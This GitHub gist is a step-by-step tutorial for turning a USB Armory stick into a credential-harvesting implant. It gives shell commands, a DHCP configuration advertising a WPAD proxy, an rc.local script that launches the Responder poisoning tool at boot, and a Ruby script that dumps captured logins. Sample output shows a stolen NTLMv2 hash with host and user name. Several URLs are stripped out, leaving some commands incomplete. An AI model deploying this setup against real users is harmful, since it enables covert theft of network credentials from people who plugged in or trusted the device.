Skip to content

Instantly share code, notes, and snippets.

Last active June 24, 2017 22:15
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save KINGSABRI/b63bb9cd61c52fd968ef9076e3fbc593 to your computer and use it in GitHub Desktop.
Save KINGSABRI/b63bb9cd61c52fd968ef9076e3fbc593 to your computer and use it in GitHub Desktop.
USB Armory How to tutorial

Installing Image

wget -c wget -c
fdisk -l

Burn the image on the microSDcard

dd if=usbarmory-debian_jessie-base_image-20170518.raw of=/dev/sdc bs=1M conv=fsync 

Setting up repositories

nano /etc/apt/source.list

remove all current repos and add the following

###### Debian Main Repos
deb stable main contrib non-free
deb-src stable main contrib non-free

deb stable-updates main contrib non-free
deb-src stable-updates main contrib non-free

deb stable/updates main
deb-src stable/updates main

deb jessie-backports main
deb-src jessie-backports main

now update your repository

apt update
apt upgrade 

Enable internet on USB aromory for

On your linux machine

iptables -I FORWARD -j ACCEPT
iptables -t nat -I POSTROUTING -o wls1 -j MASQUERADE 

since wls1 is the internet facing interface

Bash autocompletion

apt install bash-completion
nano /etc/bash.bashrc

search for (ctrl+w)

# enable bash completion in interactive shells

Then uncomment the following lines (commented by default)

if ! shopt -oq posix; then
  if [ -f /usr/share/bash-completion/bash_completion ]; then
    . /usr/share/bash-completion/bash_completion
  elif [ -f /etc/bash_completion ]; then
    . /etc/bash_completion

apply the changes

source /etc/bash.bashrc

Installing basic applications

System applications and liberaries

apt-get install -y curl git screen sqlite3 build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev autoconf postgresql pgadmin3 zlib1g-dev libxml2-dev libxslt1-dev libyaml-dev


apt-get install -y ruby ruby-dev 
gem install pry


apt-get install -y python python-pip python-dev 
pip install pycrypto

Attack Setup

Enable IP forwarding

  • Enable kernel ip forwarding
nano /etc/sysctl.conf

uncomment the following line

  • Enable firewall masqurading
iptables -t nat -I POSTROUTING -o usb0 -j MASQUERADE 

DHCPd setup

# Sample configuration file for ISC dhcpd for Debian

# have support for DDNS.
ddns-update-style none;

# option definitions common to all supported networks...
option domain-name "";
option domain-name-servers;

default-lease-time 600;
max-lease-time 7200;

# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.

# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;

# wpad
option local-proxy-config code 252 = text;

# A slightly different configuration for an internal subnet.
subnet netmask {
  default-lease-time 60;
  max-lease-time 72;
  option routers;
  option local-proxy-config "";

Responder setup

Download responder

mkdir /pentest
cd /pentest
git clone
chmod +x

Make startups

#!/bin/sh -e
# rc.local
# This script is executed at the end of each multiuser runlevel.
# Make sure that the script will "exit 0" on success or any other
# value on error.
# In order to enable or disable this script just change the execution
# bits.
# By default this script does nothing.

# Generate ssh host keys if missing
FILES=$(ls /etc/ssh/ssh_host_* 2> /dev/null | wc -l)
if [ "$FILES" = "0" ]; then
  while [ $(cat /proc/sys/kernel/random/entropy_avail) -lt 256 ]; do
    sleep 1;
  /usr/sbin/dpkg-reconfigure openssh-server

# Start DHCP server
if ! pgrep -x "dhcpd" > /dev/null
    echo "Staring DHCPd" >> /root/rc.log
    echo '' > /var/lib/dhcp/dhcpd.leases

# Start Responder
echo "Staring Responder" >> /root/rc.log
/usr/bin/screen -dmS responder bash -c 'cd /pentest/responder/; python -I usb0 -f -w -r -d -F'

echo "Staring cred watch" >> /root/rc.log
/usr/bin/screen -dmS notify bash -c 'while inotifywait -e modify /pentest/responder/Responder.db; do shutdown -h now; done'

exit 0

Post attack

To get all stolen credentials from responder, Go to /pentest/responder/Responder.db or use the following script to parse the outputs.

Install sqlite3 gem

gem install sqlite3

run the following script

#!/usr/bin/env ruby 
# Responder database reader 
require "sqlite3"

if ARGV.size == 1 
  responder_db = ARGV[0]
  puts "Respnder.db path required!\nUsage: ruby responder-reader.rb /path/responder/Responder.db"

# Open
db = responder_db
records = db.execute "SELECT * FROM responder;"
puts "[+] Number of recrods: #{records.size}"
sleep 1

records.each do |record|
 puts "Timestamp:  #{record[0]}"
 puts "Module:     #{record[1]}"
 puts "HashType:   #{record[2]}"
 puts "IPaddress:  #{record[3]}"
 puts "Hostname:   #{record[5].split('\\')[0]}"
 puts "Username:   #{record[5].split('\\')[1]}"
 puts "Cleartext:  #{record[6]}"
 puts "Hash:       #{record[7]}"
 puts "Full Hash:  #{record[8]}"
ruby responder-reader.rb /pentest/responder/Responder.db


[+] Number of recrods: 1
Timestamp:  2017-06-21 06:23:10
Module:     HTTP
HashType:   NTLMv2
Hostname:   DESKTOP-9INJ6LJ
Username:   KING
Hash:       8CVA8AFAF9909DA597CF3B7D84483438:0101000000000000241A342558EAD2013F8E3846E6C00698000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500.....
Full Hash:  KING::DESKTOP-9INJ6LJ:1122334455667788:8CVA8AFAF9909DA597CF3B7D84483438:0101000000000000241A342558EAD2013F8E3846E6C00698000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500.....
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment